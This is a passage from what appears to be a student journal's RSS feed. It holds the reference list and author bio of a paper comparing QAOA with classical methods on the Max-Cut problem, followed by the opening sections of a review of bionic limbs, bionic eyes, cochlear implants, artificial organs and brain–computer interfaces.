<p>Cai, J.-Y. (2003). <em>Lecture 20: Goemans-Williamson MAXCUT Approximation Algorithm</em>. University of Wisconsin-Madison. <a href="https://pages.cs.wisc.edu/~jyc/02-810notes/lecture20.pdf">https://pages.cs.wisc.edu/~jyc/02-810notes/lecture20.pdf</a></p>



<p>Ceroni, J. (2025). <em>QAOA introduction tutorial</em>. PennyLane Quantum Machine Learning Demos. <a href="https://pennylane.ai/qml/demos/tutorial_qaoa_intro">https://pennylane.ai/qml/demos/tutorial_qaoa_intro</a></p>



<p>Codecademy. (2022). <em>Greedy algorithm explained</em>. Codecademy. https://www.codecademy.com/article/greedy-algorithm-explained</p>



<p>Davis, R., Lanes, O., Waltrous, J. (2025). <em>What is fault-tolerant quantum computing?</em> Retrieved October 26, 2025, from <a href="https://www.ibm.com/quantum/blog/what-is-ftqc">https://www.ibm.com/quantum/blog/what-is-ftqc</a></p>



<p>DeepAI. (n.d.). <em>Combinatorial optimization – machine learning glossary.</em> DeepAI. https://deepai.org/machine-learning-glossary-and-terms/combinatorial-optimization</p>



<p>EITCA. (2024). <em>In the context of QAOA, how do the cost Hamiltonian and mixing Hamiltonian contribute to exploring the solution space, and what are their typical forms for the Max-Cut problem?</em> EITCA Academy. <a href="https://eitca.org/faq/in-the-context-of-qaoa-how-do-the-cost-hamiltonian-and-mixing-hamiltonian-contribute">https://eitca.org/faq/in-the-context-of-qaoa-how-do-the-cost-hamiltonian-and-mixing-hamiltonian-contribute</a></p>



<p>Fiveable. (n.d.). <em>Objective function</em>. Retrieved October 26, 2025, from <a href="https://library.fiveable.me/key-terms/linear-algebra-and-differential-equations/objective-function">https://library.fiveable.me/key-terms/linear-algebra-and-differential-equations/objective-function</a></p>



<p>Goemans, M. X., &amp; Williamson, D. P. (1995). <em>Improved approximation algorithms for maximum cut and satisfiability problems using semidefinite programming</em>. Journal of the ACM, 42(6), 1115–1145. <a href="https://math.mit.edu/~goemans/PAPERS/maxcut-jacm.pdf">https://math.mit.edu/~goemans/PAPERS/maxcut-jacm.pdf</a></p>



<p>Preskill, J. (2018). <em>Quantum Computing in the NISQ era and beyond</em>. Quantum, 2, 79. <a href="https://quantum-journal.org/papers/q-2018-08-06-79/pdf/">https://quantum-journal.org/papers/q-2018-08-06-79/pdf/</a></p>



<p>Ivezic, M. (2024). <em>Quantum Approximate Optimization Algorithm (QAOA)</em>. Retrieved October 26, 2025, from <a href="https://postquantum.com/quantum-computing/quantum-approximate-optimization-algorithm-qaoa/">https://postquantum.com/quantum-computing/quantum-approximate-optimization-algorithm-qaoa/</a></p>



<p>Jaillet, P. (2010). <em>NP-completeness</em>. MIT 6.006: Introduction to Algorithms. Retrieved from <a href="https://courses.csail.mit.edu/6.006/fall10/lectures/lecture24.pdf">https://courses.csail.mit.edu/6.006/fall10/lectures/lecture24.pdf</a></p>



<p>Kanwal, A. (2021). <em>Understanding P, NP, NP-complete, and NP-hard problems: A fundamental guide</em>. Medium. https://medium.com/@0ayesha.kanwal/understanding-p-np-np-complete-and-np-hard-problems-a-fundamental-guide-3924fc9ece2a</p>



<p>Lee, J. (2010). <em>A first course in combinatorial optimization.</em> Cambridge University Press. <a href="https://books.google.com.tr/books?id=3pL1B7WVYnAC&amp;pg=PA1&amp;redir_esc=y%23v=onepage&amp;q&amp;f=false">https://books.google.com.tr/books?id=3pL1B7WVYnAC&amp;pg=PA1&amp;redir_esc=y#v=onepage&amp;q&amp;f=false</a></p>



<p>Lotshaw, P. C., Nguyen, T., <a href="https://www.nature.com/articles/s41598-022-14767-w%23auth-Anthony-Santana-Aff2-Aff7">Santana</a>, A., <a href="https://www.nature.com/articles/s41598-022-14767-w%23auth-Alexander-McCaskey-Aff2-Aff3-Aff8">McCaskey</a>, A., <a href="https://www.nature.com/articles/s41598-022-14767-w%23auth-Rebekah-Herrman-Aff4">Herrman</a>, R., <a href="https://www.nature.com/articles/s41598-022-14767-w%23auth-James-Ostrowski-Aff4">Ostrowski</a>, J., <a href="https://www.nature.com/articles/s41598-022-14767-w%23auth-George-Siopsis-Aff5">Siopsis</a>, G., &amp; <a href="https://www.nature.com/articles/s41598-022-14767-w%23auth-Travis_S_-Humble-Aff1-Aff3">Humble</a>, T. S. (2022). <em>Scaling quantum approximate optimization on near-term hardware</em>. Scientific Reports, Nature Publishing Group. <a href="https://www.nature.com/articles/s41598-022-14767-w">https://www.nature.com/articles/s41598-022-14767-w</a></p>



<p>Luca, G. D. (2023). <em>Introduction to graph theory. Baeldung on Computer Science</em>. <a href="https://www.baeldung.com/cs/graph-theory-intro">https://www.baeldung.com/cs/graph-theory-intro</a></p>



<p>Mahmoud, A. (2021, June 27). <em>What is Quantum Computing? </em>h<a href="https://www.techspot.com/article/2280-what-is-quantum-computing">ttps://www.techspot.com/article/2280-what-is-quantum-computing</a></p>



<p>Maltby, H., &amp; Ross, E. (n.d.). <em>Combinatorial optimization</em>. Brilliant. <a href="https://brilliant.org/wiki/combinatorial-optimization/">https://brilliant.org/wiki/combinatorial-optimization</a></p>



<p>Rossi, M., Cohen, S., &amp; Smith, J. (2024). <em>What is Quantum Parallelism, Anyhow?</em>. <a href="https://arxiv.org/html/2405.07222v1">https://arxiv.org/html/2405.07222v1</a></p>



<p>Swayne, M. (2024). <em>Quantum computing challenges</em>. <a href="https://thequantuminsider.com/2023/03/24/quantum-computing-challenges/">https://thequantuminsider.com/2023/03/24/quantum-computing-challenges/</a></p>



<p>Tepanyan, H. (2025). <em>Quantum Computing vs. Classical Computing</em>. Retrieved October 26, 2025, from <a href="https://www.bluequbit.io/quantum-computing-vs-classical-computing">https://www.bluequbit.io/quantum-computing-vs-classical-computing</a></p>



<p>Thomson, J. (2025). <em>What is quantum superposition and what does it mean for quantum computing?</em> Retrieved October 26, 2025, from <a href="https://www.livescience.com/technology/computing/what-is-quantum-superposition-and-what-does-it-mean-for-quantum-computing">https://www.livescience.com/technology/computing/what-is-quantum-superposition-and-what-does-it-mean-for-quantum-computing</a></p>



<p>Toni, B. (2018). Max-Cut lecture notes (PDF). University of Toronto. <a href="http://www.cs.toronto.edu/~toni/Courses/Proofs-SOS-2018/Lectures/maxcut.pdf%255C">http://www.cs.toronto.edu/~toni/Courses/Proofs-SOS-2018/Lectures/maxcut.pdf\</a></p>



<p>Viana, P.A., Neto, F. (2024). <em>Quantum search algorithms for structured databases</em>. <a href="https://arxiv.org/pdf/2501.01058">https://arxiv.org/pdf/2501.01058</a></p>



<p>Wright, S. J. (2025).<em> Optimization Definition, Techniques, &amp; Facts</em>. Encyclopaedia Britannica. <a href="https://www.britannica.com/science/optimization">https://www.britannica.com/science/optimization</a></p>



<p><strong>Data and code used in this paper are available in github.</strong></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Yohhaan Yung Kang Huang</h5><p>Yohhaan Yung Kang Huang is a high school senior passionate about quantum computing and algorithmic problem-solving. Under the mentorship of Dr. Roberto Dos Reis from Northwestern University, he explored how the Quantum Approximate Optimization Algorithm (QAOA) performs on near-term quantum hardware compared to classical methods. He plans to pursue further studies in computer science and quantum information science and contribute to the development of practical quantum technologies. He loves robotics and is part of the school’s FRC team, enjoys music, and plays the piano. He is also driven to help neurodivergent students integrate better in academic and social environments.


</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices/">Quantum Approximate Optimization Algorithm for the Max-Cut Problem: Performance Comparison with Classical Approaches on NISQ Devices</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Advanced Human–Computer Interfaces and AI : A Comprehensive Review</title>
		<link>https://exploratiojournal.com/advanced-human-computer-interfaces-and-ai-a-comprehensive-review/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=advanced-human-computer-interfaces-and-ai-a-comprehensive-review</link>
		
		<dc:creator><![CDATA[Vyomesh Vikram Singh]]></dc:creator>
		<pubDate>Tue, 21 Oct 2025 21:05:29 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4392</guid>

					<description><![CDATA[<p>Vyomesh Vikram Singh<br />
City Montessori School</p>
<p>The post <a href="https://exploratiojournal.com/advanced-human-computer-interfaces-and-ai-a-comprehensive-review/">Advanced Human–Computer Interfaces and AI : A Comprehensive Review</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Vyomesh Vikram Singh<br><strong>Mentor</strong>: Dr. Zion Tse<br><em>City Montessori School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>Human–computer interfaces represent a rapidly advancing frontier in biomedical engineering, integrating mechanical, electronic, neural, and Artificial Intelligence (AI) technologies to restore or augment lost human function. This review synthesizes recent developments in Advanced Human–Computer Interfaces, organs, and neural interfaces, drawing on both clinical and engineering perspectives. With a focus on state-of-the-art innovations published within the last five years, the paper highlights breakthroughs in AI-driven sensory feedback, adaptive control algorithms, biomaterials, and clinical translation. By situating these advances within the broader context of unmet clinical needs and rehabilitation goals, this review identifies current challenges and outlines future directions for fully integrated, intelligent human-machine systems.</p>



<p><em>Index Terms</em></p>



<p><em>Machine learning, Deep learning, Reinforcement learning, Edge computing, On-device AI, Computer vision, Bionic limbs, brain–computer interfaces, prosthetics, neuromorphic vision, osseointegration, artificial pancreas, neural interfaces, Advanced Human–Computer Interfaces, AI, biomedical engineering, neuroprosthetics, human–machine symbiosis, wearable robotics, neuroengineering, biocompatible materials, smart prosthetics, adaptive control, closed-loop systems, neural decoding, assistive technology, implantable devices, bioelectronics, translational medicine, cybernetics.</em></p>



<h2 class="wp-block-heading">I. Introduction</h2>



<p>The pursuit of artificial devices that restore lost biological function is as old as medicine itself, with early wooden prosthetic legs and iron hooks marking humanity’s first attempts at bionics. In the modern era, bionic devices have come to represent a class of technologies that combine mechanical hardware, electronic control, and neural interfacing to restore sensory, motor, or organ-level function. These devices are no longer crude substitutes; rather, they aim for seamless integration with the human nervous system, allowing users to experience levels of dexterity, feedback, and autonomy once thought impossible.</p>



<p>The importance of this field is underscored by the prevalence of disability worldwide. According to the World Health Organization, over 2.4 billion people globally live with conditions requiring rehabilitation [21]. Of these, limb loss affects more than 57 million people, while vision loss (addressable by devices like the bionic eye) impacts at least 43 million blind individuals [21]. In diabetes alone, more than 530 million people require continuous glucose management, and the artificial pancreas is emerging as a transformative bionic organ [23]. These statistics highlight the vast unmet need that bionic technologies attempt to address.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="754" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1024x754.jpeg" alt="" class="wp-image-4555" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1024x754.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-300x221.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-768x566.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1000x736.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-230x169.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-350x258.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-480x354.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 1: Global burden of conditions addressed by bionics. Bars show approximate affected populations: limb loss (57M), blindness (43M), cochlear implant users (∼0.7M), and diabetes (530M). Data sources: WHO Global Report on Rehabilitation [21] (limb loss, blindness, diabetes) and Wilson (cochlear implant users) [24].</p>



<h2 class="wp-block-heading">II. Overview of Human-Computer Interfaces</h2>



<p>Human–Computer Interfaces (HCIs) can be defined as artificial constructs designed to replace or augment biological structures, with the unique feature of neural, physiological, and increasingly AI-driven integration. Unlike conventional prosthetics or implants that function passively, HCIs actively sense, compute, learn, and actuate.</p>



<p>Historically, the field has undergone several stages. Early prosthetics, such as Egyptian wooden toes or Roman iron hands, were primarily cosmetic or functional in the most basic sense. By the 16th century, artisans like Ambroise Paré introduced mechanical limbs with crude joint mechanisms. The 20th century saw the introduction of body-powered prostheses (using cables and harnesses), followed by the revolutionary myoelectric control in the 1960s, which used Electromyographic (EMG) signals for actuation [16]. In parallel, sensory HCIs began with the cochlear implant (1972), the first device to restore a lost sensory modality via direct neural stimulation, paving the way for retinal implants and, more recently, neuromorphic vision systems based on organic semiconductors and perovskite nanowire arrays [10], [11]. Organ-level HCIs have also advanced, most notably the artificial pancreas, which integrates glucose sensors, insulin pumps, and AI-based closed-loop metabolic control algorithms [23].</p>



<p>To situate the reader in the diversity of modern HCIs, Table I summarizes major categories of systems, their principles of operation, and representative examples. This overview highlights a unifying theme: HCIs are no longer restricted to mechanical substitution. Instead, modern systems seek bidirectional communication with the nervous system—allowing users not only to control artificial devices but also to receive naturalistic sensory feedback enhanced by adaptive AI.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="346" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-1024x346.jpeg" alt="" class="wp-image-4556" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-1024x346.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-300x101.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-768x260.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-1000x338.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-230x78.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-350x118.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-480x162.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 2: Taxonomy of Human–Computer Interfaces (HCIs) across five categories: limbs [1], eyes [10], ears [22], organs [23], and brain–computer interfaces (BCIs) [14].</p>



<p>TABLE I: Major Classes of Bionic Devices, Principles, and Examples</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Category</td><td></td><td>Principle of Operation</td><td></td><td>Key Examples</td><td>Representative</td></tr><tr><td>Bionic Limbs</td><td></td><td>Capture myoelectric/neuralsignals; actuate robotic joints; provide sensory feedback via electrodes/sensors</td><td></td><td>NeuromusculoskeletalProsthesis; bidirectional limb; targeted reinnervation systems</td><td>Ortiz-Catalan et al.(2023) [1], Marascoet al. (2021) [3]</td></tr><tr><td>Bionic Eye</td><td></td><td>Convert light into electrical signals processed by neuromorphic/electrode arrays interfacing with retina or optic nerve</td><td></td><td>Argus II retinal prosthesis;perovskite nanowireRetina; TIPS-pentacene retina</td><td>Long et al.(2023) [10], Zhanget al. (2023) [11]</td></tr><tr><td>Bionic Ear</td><td></td><td>Convert sound into electricalimpulses transmitted viacochlear electrodes</td><td></td><td>Cochlear implant</td><td>Loizou (2006) [22],Wilson (2017) [24]</td></tr><tr><td>Bionic Organs</td><td></td><td>Closed-loop sensing andactuation replacing organ-level function</td><td></td><td>Artificial pancreas; bioartificial heart pumps</td><td>Hovorka (2011) [23],Breton (2019)</td></tr><tr><td>Neural Interfaces / Brain Computer Interfaces (BCIs)</td><td></td><td>Decode brain or peripheralnerve activity to controlexternal devices; deliverstimulation for feedback</td><td></td><td>Utah array BCIs; Regenerative peripheral nerve interfaces (RPNIs)</td><td>Hochberg et al.(2012) [14], Cho etal. (2023) [7]</td></tr></tbody></table></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="395" height="592" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-2.jpeg" alt="" class="wp-image-4557" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-2.jpeg 395w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-2-200x300.jpeg 200w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-2-230x345.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-2-350x525.jpeg 350w" sizes="(max-width: 395px) 100vw, 395px" /></figure>



<p>Fig. 3: Functional pipeline of a bionic device: input signals (e.g., EMG/EEG/sensors) → processing/AI → actuation (prosthesis/pump) → feedback (tactile/visual/auditory).</p>



<h2 class="wp-block-heading">III. Current Types of Human-Computer Interfaces</h2>



<p>HCIs span a wide range of applications, from motor prostheses that restore limb function to sensory prostheses that recreate lost modalities such as hearing and vision. In addition, organ-level HCIs represent an emerging frontier where closed-loop control systems, often enhanced by AI, substitute for failing metabolic or physiological functions. In this section, we review the major classes of HCIs, focusing on their principles of operation, technological foundations, and representative studies from a span of five years. Throughout this review, we use Human–Computer Interfaces (HCIs) as the overarching term for technologies that bridge biological and computational systems. Terms such as bionic limbs, bionic eyes, and related phrases are used to denote specific subsets of HCIs, rather than distinct categories.</p>



<h4 class="wp-block-heading">A. Bionic Limbs</h4>



<p>Upper-Limb Prostheses: Upper-limb prostheses have progressed from simple hooks to highly dexterous, multi-articulated robotic hands with neural control. The control of such devices primarily relies on myoelectric signals derived from the residual muscles of the forearm or upper arm. However, conventional surface EMG suffers from poor signal quality, cross-talk, and electrode displacement. To overcome these limitations, modern systems employ implanted electrodes (epimysial, intramuscular) that record stable myoelectric activity over years [1].</p>



<ol class="wp-block-list"></ol>



<p>1. Advanced interfaces include Targeted Muscle Reinnervation (TMR) and Regenerative Peripheral Nerve Interfaces (RPNIs). TMR surgically reroutes residual nerves to denervated muscles, creating new, amplifiable EMG sites [16]. RPNIs implant nerve endings into muscle grafts, forming stable bioelectrical sources for long-term control [7]. These constructs amplify weak nerve signals into robust EMG activity, enabling fine motor decoding through pattern recognition or regression algorithms.</p>



<p>Recent clinical translation is exemplified by Ortiz-Catalan et al. , who demonstrated a transradial neuromusculoskeletal prosthesis integrating osseointegrated titanium implants, implanted electrodes, and neural stimulation [1]. The patient achieved stable prosthetic use in daily life for more than three years,</p>



<p>TABLE II: Representative Advances in Bionic Limbs</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Study / Device</td><td>Key innovation</td><td>Control Strategy</td><td>Sensory Feedback</td><td>Clinical&nbsp; Outcome</td></tr><tr><td>Ortiz-Catalan et al. (2023) [1]</td><td>OsseointegratedNeuromusculo-skeletal prosthesis</td><td>ImplantedEMG (native +graft)<br></td><td>Ulnar nerve cuff, tactile feedback</td><td>&gt;3 years daily use;Pain reduction</td></tr><tr><td>Marasco et al. (2021) [3]</td><td>Fusion of touch, kinesthesia, and motor control</td><td>TMR&nbsp; + TSR&nbsp;EMG</td><td>Kinesthetic +Tactile reinnervation</td><td>Able-bodied visuomotor behaviours</td></tr><tr><td>Open Source Leg (2020) [6]</td><td>Modular, programmable powered leg</td><td>Adaptive gait control</td><td>Not integrated</td><td>Clinical testing in transfemoral amputees</td></tr><tr><td>BeBionic / i-Limb (commercial)</td><td>Multiarticulated commercial hands</td><td>Surface EMG,Pattern recognition</td><td>Limited vibrotactile feedback</td><td>Widely available, limited embodiment</td></tr></tbody></table></figure>



<p>with reduced phantom limb pain and improved quality of life. This represents one of the first long-term demonstrations of a self-contained neural prosthesis outside the laboratory.</p>



<p>In addition to control, sensory feedback has become a critical area of research. Extraneural cuff electrodes and intraneural arrays can evoke tactile percepts in the phantom limb when coupled with sensorized prosthetic hands [2]. Marasco et al. further demonstrated the fusion of touch, kinesthesia, and motor control, restoring able-bodied visuomotor behaviors such as reducing visual fixation on the prosthetic hand [3]. These findings suggest that upper-limb prostheses are approaching a new level of embodiment and naturalistic use.</p>



<p>2. Lower-Limb Prostheses: Lower-limb bionics are distinguished by the need to restore both mobility and load-bearing stability. Microprocessor-controlled knees (e.g., Ottobock C-Leg, Össur Rheo Knee) represent the current standard of care, providing adaptive damping based on gait phase detection. Recent developments extend this paradigm to powered prosthetic legs, which incorporate actuators at the knee and ankle.</p>



<ol start="2" class="wp-block-list"></ol>



<p>The Open Source Leg (OSL) is a notable example, offering a modular, customizable platform with open hardware and software [6]. Clinically tested on transfemoral amputees, the OSL provides knee and ankle actuation with programmable gait dynamics. This democratized design accelerates innovation by lowering barriers for academic and clinical groups to experiment with novel control strategies.</p>



<p>3. Osseointegration and Direct Skeletal Attachment: Conventional socket-based attachment causes discomfort, skin breakdown, and instability. Osseointegration—anchoring the prosthesis directly to the skeleton via titanium implants—addresses these issues [15]. Beyond mechanical benefits, osseointegration serves as a human–machine gateway, enabling safe percutaneous feedthroughs for electrodes and sensors. This transforms the limb into a bidirectional interface, capable of both decoding neural intent and delivering somatosensory feedback [1].</p>



<ol start="3" class="wp-block-list"></ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="573" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-1024x573.jpeg" alt="" class="wp-image-4558" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-1024x573.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-300x168.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-768x430.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-1000x560.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-230x129.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-350x196.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-480x269.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 4: Comparative performance metrics across device classes (illustrative 0–10 scores). Values synthesize trends reported in representative studies on neuromusculoskeletal limbs [1], [3], bionic vision and retinal systems [5], [10], [11], cochlear implants [22], [24], artificial pancreas systems [23], and clinical/BCI demonstrations [13], [14].</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="528" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-1024x528.png" alt="" class="wp-image-4559" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-1024x528.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-300x155.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-768x396.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-1000x516.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-230x119.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-350x181.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-480x248.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM.png 1314w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 5: Case study schematic of osseointegration and neural interfaces in human–computer interface (HCI) limbs. The diagram shows bone anchoring, titanium implant, prosthesis connector, electrodes to nerve/muscle, and percutaneous feedthroughs. Legend: (1) Bone, (2) Titanium implant, (3) Prosthesis connector, (4) Electrodes to nerve/muscle, (5) Skin layer (dashed).</p>



<p>TABLE III: Recent Innovations in Bionic Vision</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Device / Material</td><td>Key Feature</td><td>Advantage</td></tr><tr><td></td><td></td><td></td></tr><tr><td>Argus II (Second Sight)</td><td>Retinal electrode array</td><td>Restores basic light perception</td></tr><tr><td>Long et al. (2023)</td><td>Perovskite nanowire retina</td><td>Filter-free color vision; wide FoV</td></tr><tr><td>Zhang et al. (2023)</td><td>TIPS-pentacene organic retina</td><td>Broadband; synaptic plasticity</td></tr><tr><td>Artificial Synapse Retinas</td><td>Memristor-based photonic synapses</td><td>In-device preprocessing; memory</td></tr><tr><td></td><td></td><td></td></tr></tbody></table></figure>



<h4 class="wp-block-heading">B. Bionic Eyes</h4>



<p>The restoration of vision is among the most ambitious goals of sensory prosthetics. Early retinal implants such as Argus II used electrode arrays to stimulate the surviving retinal ganglion cells, enabling basic light perception and object localization [5]. However, spatial resolution remained low, and the devices were limited to high-contrast vision.</p>



<p>Recent approaches leverage neuromorphic engineering and novel materials. Long et al. reported a hemispherical perovskite nanowire retina capable of filter-free color recognition [10]. By integrating adaptive optics with neuromorphic preprocessing circuits, the system achieved wide-field, low-noise, and low-power color vision. Similarly, Zhang et al. developed a TIPS-pentacene phototransistor retina, exhibiting broadband sensitivity (380–740 nm), high optical transparency, and synaptic plasticity for visual memory [11]. The choice of TIPS-pentacene, with its narrow bandgap (∼1.6 eV), enabled efficient photon absorption across the visible spectrum, mimicking natural photoreceptors.</p>



<p>These neuromorphic systems go beyond electrode-based stimulation by embedding preprocessing within the retina itself, thereby reducing latency and power consumption. While still in preclinical stages, they represent a paradigm shift toward bioinspired vision systems capable of continuous learning and adaptation.</p>



<h4 class="wp-block-heading">C. Bionic Ears</h4>



<p>The cochlear implant remains the most successful sensory prosthesis to date, with more than 700,000 users worldwide [22]. It works by bypassing damaged hair cells of the cochlea and directly stimulating the auditory nerve with electrode arrays. Modern cochlear implants use advanced signal processing algorithms to decompose sound into frequency channels and deliver spatially coded electrical impulses.</p>



<p>Key technological progress includes fine structure processing, which encodes temporal cues for improved music perception, and optogenetic cochlear implants, which use light to stimulate genetically modified neurons with higher precision [24]. While conventional devices are limited to about 22 electrode channels, optogenetic approaches promise higher resolution with reduced channel interaction.</p>



<h4 class="wp-block-heading">D. Bionic Organs</h4>



<ol class="wp-block-list">
<li>Artificial Pancreas: The artificial pancreas integrates a Continuous Glucose Monitor (CGM) with an insulin pump under closed-loop algorithmic control. Early systems used Proportional–Integral–Derivative (PID) control, but modern devices employ Model Predictive Control (MPC), which anticipates glucose fluctuations based on meals, exercise, and circadian rhythms [23]. Clinical trials show that MPC-based artificial pancreas systems reduce hypoglycemia incidence and improve HbA1c compared to conventional insulin therapy.</li>



<li>Other Organ-Level Devices: Beyond diabetes, prototypes of bionic kidneys (artificial filtration units) and bioartificial hearts are under investigation. For example, wearable dialysis systems combine nanoporous membranes with microfluidic pumps, while ventricular assist devices integrate soft robotics for pulsatile flow. While less mature than limb or sensory prostheses, these devices extend the concept of bionics to systemic organ replacement.</li>
</ol>



<h4 class="wp-block-heading">E. Neural Interfaces and Brain–Computer Interfaces</h4>



<ol start="5" class="wp-block-list"></ol>



<p>Neural interfaces serve both as standalone assistive technologies and as enabling components of bionic limbs and sensory devices. They can be broadly classified as non-invasive (EEG, fNIRS), minimally invasive (ECoG), and invasive (Utah arrays, intraneural electrodes).</p>



<p>Non-invasive BCIs offer safety and accessibility but suffer from low spatial and temporal resolution. Invasive approaches achieve higher bandwidth but face challenges of biocompatibility and stability. Recent advances include:</p>



<ul class="wp-block-list">
<li>Hybrid nerve interfaces (Cho et al., 2023) that combine RPNIs with shape-memory polymer buckles, achieving stable bidirectional signaling in animal models [7].</li>



<li>Reinforcement learning-based BCIs that improve prosthetic hand control accuracy by double to triple compared to supervised learning [12].</li>



<li>Bidirectional BCIs that not only decode motor intent but also deliver sensory feedback through cortical stimulation [13], [14].</li>
</ul>



<p>These technologies are converging toward closed-loop systems, where intention and perception are integrated within the same neural–machine cycle.</p>



<h2 class="wp-block-heading">IV. Technological Advancements and State-of-the-Art </h2>



<p>The performance of bionic devices is fundamentally constrained by the quality of their materials, sensors, actuators, and neural interfacing technologies. In recent years, breakthroughs in biocompatible materials, microelectronics, and artificial intelligence have dramatically improved the fidelity of motor control, the richness of sensory feedback, and the long-term stability of implantable systems. This section reviews these advances, emphasizing both the underlying mechanisms and the way they address prior limitations.</p>



<h4 class="wp-block-heading">A. Materials for Bionics</h4>



<p>1. Biocompatible Polymers and Flexible Electronics: Traditional rigid electronics are poorly matched to the soft, dynamic environment of biological tissue, often leading to inflammatory responses and signal degradation. Flexible polymers such as polyimide, PDMS (polydimethylsiloxane), and parylene-C have become standard substrates for implantable electrodes. These materials reduce mechanical mismatch, minimizing scar tissue encapsulation and improving long-term signal stability [9].</p>



<ol class="wp-block-list"></ol>



